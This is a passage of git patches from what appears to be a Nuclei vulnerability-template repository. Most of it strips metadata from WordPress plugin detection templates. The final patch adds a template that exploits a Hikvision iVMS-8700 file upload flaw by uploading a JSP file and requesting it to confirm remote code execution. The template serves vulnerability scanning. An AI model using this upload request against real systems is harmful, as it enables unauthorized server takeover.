index ba214fd7ea..a7ccde0b49 100644
--- a/http/technologies/wordpress/plugins/wp-google-maps.yaml
+++ b/http/technologies/wordpress/plugins/wp-google-maps.yaml
@@ -7,7 +7,6 @@ info:
reference:
- https://wordpress.org/plugins/wp-google-maps/
metadata:
- max-request: 1
plugin_namespace: wp-google-maps
wpscan: https://wpscan.com/plugin/wp-google-maps
tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/wp-mail-smtp.yaml b/http/technologies/wordpress/plugins/wp-mail-smtp.yaml
index 8f5fe8d9a5..422664a98c 100644
--- a/http/technologies/wordpress/plugins/wp-mail-smtp.yaml
+++ b/http/technologies/wordpress/plugins/wp-mail-smtp.yaml
@@ -7,7 +7,6 @@ info:
reference:
- https://wordpress.org/plugins/wp-mail-smtp/
metadata:
- max-request: 1
plugin_namespace: wp-mail-smtp
wpscan: https://wpscan.com/plugin/wp-mail-smtp
tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/wp-maintenance-mode.yaml b/http/technologies/wordpress/plugins/wp-maintenance-mode.yaml
index 0458b13354..f0af3a748a 100644
--- a/http/technologies/wordpress/plugins/wp-maintenance-mode.yaml
+++ b/http/technologies/wordpress/plugins/wp-maintenance-mode.yaml
@@ -7,7 +7,6 @@ info:
reference:
- https://wordpress.org/plugins/wp-maintenance-mode/
metadata:
- max-request: 1
plugin_namespace: wp-maintenance-mode
wpscan: https://wpscan.com/plugin/wp-maintenance-mode
tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/wp-migrate-db.yaml b/http/technologies/wordpress/plugins/wp-migrate-db.yaml
index d570be07bf..f89f1a20b3 100644
--- a/http/technologies/wordpress/plugins/wp-migrate-db.yaml
+++ b/http/technologies/wordpress/plugins/wp-migrate-db.yaml
@@ -7,7 +7,6 @@ info:
reference:
- https://wordpress.org/plugins/wp-migrate-db/
metadata:
- max-request: 1
plugin_namespace: wp-migrate-db
wpscan: https://wpscan.com/plugin/wp-migrate-db
tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/wp-multibyte-patch.yaml b/http/technologies/wordpress/plugins/wp-multibyte-patch.yaml
index ee05e3add8..01fb12d0ad 100644
--- a/http/technologies/wordpress/plugins/wp-multibyte-patch.yaml
+++ b/http/technologies/wordpress/plugins/wp-multibyte-patch.yaml
@@ -7,7 +7,6 @@ info:
reference:
- https://wordpress.org/plugins/wp-multibyte-patch/
metadata:
- max-request: 1
plugin_namespace: wp-multibyte-patch
wpscan: https://wpscan.com/plugin/wp-multibyte-patch
tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/wp-optimize.yaml b/http/technologies/wordpress/plugins/wp-optimize.yaml
index df2487955f..1773857e15 100644
--- a/http/technologies/wordpress/plugins/wp-optimize.yaml
+++ b/http/technologies/wordpress/plugins/wp-optimize.yaml
@@ -7,7 +7,6 @@ info:
reference:
- https://wordpress.org/plugins/wp-optimize/
metadata:
- max-request: 1
plugin_namespace: wp-optimize
wpscan: https://wpscan.com/plugin/wp-optimize
tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/wp-pagenavi.yaml b/http/technologies/wordpress/plugins/wp-pagenavi.yaml
index 79ff01211c..bcd1509c68 100644
--- a/http/technologies/wordpress/plugins/wp-pagenavi.yaml
+++ b/http/technologies/wordpress/plugins/wp-pagenavi.yaml
@@ -7,7 +7,6 @@ info:
reference:
- https://wordpress.org/plugins/wp-pagenavi/
metadata:
- max-request: 1
plugin_namespace: wp-pagenavi
wpscan: https://wpscan.com/plugin/wp-pagenavi
tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/wp-reset.yaml b/http/technologies/wordpress/plugins/wp-reset.yaml
index 23414b3d1d..c6aca20a60 100644
--- a/http/technologies/wordpress/plugins/wp-reset.yaml
+++ b/http/technologies/wordpress/plugins/wp-reset.yaml
@@ -7,7 +7,6 @@ info:
reference:
- https://wordpress.org/plugins/wp-reset/
metadata:
- max-request: 1
plugin_namespace: wp-reset
wpscan: https://wpscan.com/plugin/wp-reset
tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/wp-sitemap-page.yaml b/http/technologies/wordpress/plugins/wp-sitemap-page.yaml
index a04ddc6003..783d381ed8 100644
--- a/http/technologies/wordpress/plugins/wp-sitemap-page.yaml
+++ b/http/technologies/wordpress/plugins/wp-sitemap-page.yaml
@@ -7,7 +7,6 @@ info:
reference:
- https://wordpress.org/plugins/wp-sitemap-page/
metadata:
- max-request: 1
plugin_namespace: wp-sitemap-page
wpscan: https://wpscan.com/plugin/wp-sitemap-page
tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/wp-smushit.yaml b/http/technologies/wordpress/plugins/wp-smushit.yaml
index 2ead906817..8bdc600063 100644
--- a/http/technologies/wordpress/plugins/wp-smushit.yaml
+++ b/http/technologies/wordpress/plugins/wp-smushit.yaml
@@ -7,7 +7,6 @@ info:
reference:
- https://wordpress.org/plugins/wp-smushit/
metadata:
- max-request: 1
plugin_namespace: wp-smushit
wpscan: https://wpscan.com/plugin/wp-smushit
tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/wp-statistics.yaml b/http/technologies/wordpress/plugins/wp-statistics.yaml
index dedd2e23b6..ab61cc0338 100644
--- a/http/technologies/wordpress/plugins/wp-statistics.yaml
+++ b/http/technologies/wordpress/plugins/wp-statistics.yaml
@@ -7,7 +7,6 @@ info:
reference:
- https://wordpress.org/plugins/wp-statistics/
metadata:
- max-request: 1
plugin_namespace: wp-statistics
wpscan: https://wpscan.com/plugin/wp-statistics
tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/wp-super-cache.yaml b/http/technologies/wordpress/plugins/wp-super-cache.yaml
index 03cd7137a8..5f6fbc1f75 100644
--- a/http/technologies/wordpress/plugins/wp-super-cache.yaml
+++ b/http/technologies/wordpress/plugins/wp-super-cache.yaml
@@ -7,7 +7,6 @@ info:
reference:
- https://wordpress.org/plugins/wp-super-cache/
metadata:
- max-request: 1
plugin_namespace: wp-super-cache
wpscan: https://wpscan.com/plugin/wp-super-cache
tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/wp-user-avatar.yaml b/http/technologies/wordpress/plugins/wp-user-avatar.yaml
index a68d4b7d78..d67150d038 100644
--- a/http/technologies/wordpress/plugins/wp-user-avatar.yaml
+++ b/http/technologies/wordpress/plugins/wp-user-avatar.yaml
@@ -7,7 +7,6 @@ info:
reference:
- https://wordpress.org/plugins/wp-user-avatar/
metadata:
- max-request: 1
plugin_namespace: wp-user-avatar
wpscan: https://wpscan.com/plugin/wp-user-avatar
tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml b/http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml
index bf9dfc3ad8..beeba7ca69 100644
--- a/http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml
+++ b/http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml
@@ -7,7 +7,6 @@ info:
reference:
- https://wordpress.org/plugins/wpcf7-recaptcha/
metadata:
- max-request: 1
plugin_namespace: wpcf7-recaptcha
wpscan: https://wpscan.com/plugin/wpcf7-recaptcha
tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/wpcf7-redirect.yaml b/http/technologies/wordpress/plugins/wpcf7-redirect.yaml
index 47911a86a5..c225df7bfd 100644
--- a/http/technologies/wordpress/plugins/wpcf7-redirect.yaml
+++ b/http/technologies/wordpress/plugins/wpcf7-redirect.yaml
@@ -7,7 +7,6 @@ info:
reference:
- https://wordpress.org/plugins/wpcf7-redirect/
metadata:
- max-request: 1
plugin_namespace: wpcf7-redirect
wpscan: https://wpscan.com/plugin/wpcf7-redirect
tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/wpforms-lite.yaml b/http/technologies/wordpress/plugins/wpforms-lite.yaml
index 1c25b6f488..aaad04cb76 100644
--- a/http/technologies/wordpress/plugins/wpforms-lite.yaml
+++ b/http/technologies/wordpress/plugins/wpforms-lite.yaml
@@ -7,7 +7,6 @@ info:
reference:
- https://wordpress.org/plugins/wpforms-lite/
metadata:
- max-request: 1
plugin_namespace: wpforms-lite
wpscan: https://wpscan.com/plugin/wpforms-lite
tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/wps-hide-login.yaml b/http/technologies/wordpress/plugins/wps-hide-login.yaml
index b36317acd8..ff750a7d2a 100644
--- a/http/technologies/wordpress/plugins/wps-hide-login.yaml
+++ b/http/technologies/wordpress/plugins/wps-hide-login.yaml
@@ -7,7 +7,6 @@ info:
reference:
- https://wordpress.org/plugins/wps-hide-login/
metadata:
- max-request: 1
plugin_namespace: wps-hide-login
wpscan: https://wpscan.com/plugin/wps-hide-login
tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml b/http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml
index 5eb35dd17e..f1e7595ccd 100644
--- a/http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml
+++ b/http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml
@@ -7,7 +7,6 @@ info:
reference:
- https://wordpress.org/plugins/wpvivid-backuprestore/
metadata:
- max-request: 1
plugin_namespace: wpvivid-backuprestore
wpscan: https://wpscan.com/plugin/wpvivid-backuprestore
tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml b/http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml
index ceb2b8d600..4b2769ee46 100644
--- a/http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml
+++ b/http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml
@@ -7,7 +7,6 @@ info:
reference:
- https://wordpress.org/plugins/yith-woocommerce-wishlist/
metadata:
- max-request: 1
plugin_namespace: yith-woocommerce-wishlist
wpscan: https://wpscan.com/plugin/yith-woocommerce-wishlist
tags: tech,wordpress,wp-plugin,top-100,top-200
From 62f0c160d802f55446d71f5a97f7ed8d9929fb0a Mon Sep 17 00:00:00 2001
From: Sandeep Singh
Date: Sun, 25 Jun 2023 14:32:37 +0530
Subject: [PATCH 542/670] Added Hikvision iVMS-8700 - File Upload Remote Code
Execution (#7536)
Co-authored-by: brucelsone <101378596+brucelsone@users.noreply.github.com>
---
.../hikvision-ivms-file-upload-rce.yaml | 51 +++++++++++++++++++
1 file changed, 51 insertions(+)
create mode 100644 http/vulnerabilities/hikvision-ivms-file-upload-rce.yaml
diff --git a/http/vulnerabilities/hikvision-ivms-file-upload-rce.yaml b/http/vulnerabilities/hikvision-ivms-file-upload-rce.yaml
new file mode 100644
index 0000000000..6476e0d0d3
--- /dev/null
+++ b/http/vulnerabilities/hikvision-ivms-file-upload-rce.yaml
@@ -0,0 +1,51 @@
+id: hikvision-ivms-file-upload-rce
+
+info:
+ name: Hikvision iVMS-8700 - File Upload Remote Code Execution
+ author: brucelsone
+ severity: critical
+ description: |
+ Arbitrary file upload vulnerability in HIKVISION iVMS-8700 Integrated Security Management Platform Software allows attackers to upload and execute malicious files, leading to potential unauthorized server control.
+ reference:
+ - https://www.wangan.com/p/11v754aceadb994f
+ - https://cn-sec.com/archives/1828326.html
+ metadata:
+ max-request: 2
+ fofa-query: icon_hash="-911494769"
+ tags: hikvision,ivms,fileupload,rce,intrusive
+
+variables:
+ str1: '{{rand_base(6)}}'
+ str2: '{{rand_base(6)}}'
+ str3: '<%out.print("{{str2}}");%>'
+
+http:
+ - raw:
+ - |
+ POST /eps/resourceOperations/upload.action HTTP/1.1
+ Host: {{Hostname}}
+ User-Agent: MicroMessenger
+ Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryTJyhtTNqdMNLZLhj
+
+ ------WebKitFormBoundaryTJyhtTNqdMNLZLhj
+ Content-Disposition: form-data; name="fileUploader";filename="{{str1}}.jsp"
+ Content-Type: image/jpeg
+
+ {{str3}}
+ ------WebKitFormBoundaryTJyhtTNqdMNLZLhj--
+
+ - |
+ GET /eps/upload/{{res_id}}.jsp HTTP/1.1
+ Host: {{Hostname}}
+
+ extractors:
+ - type: json
+ name: res_id
+ json:
+ - ".data.resourceUuid"
+ internal: true
+
+ matchers:
+ - type: dsl
+ dsl:
+ - body_2 == str2
\ No newline at end of file
From 9be65bb831c704c8d360bdca7881fae13d94e6bc Mon Sep 17 00:00:00 2001
From: GitHub Action |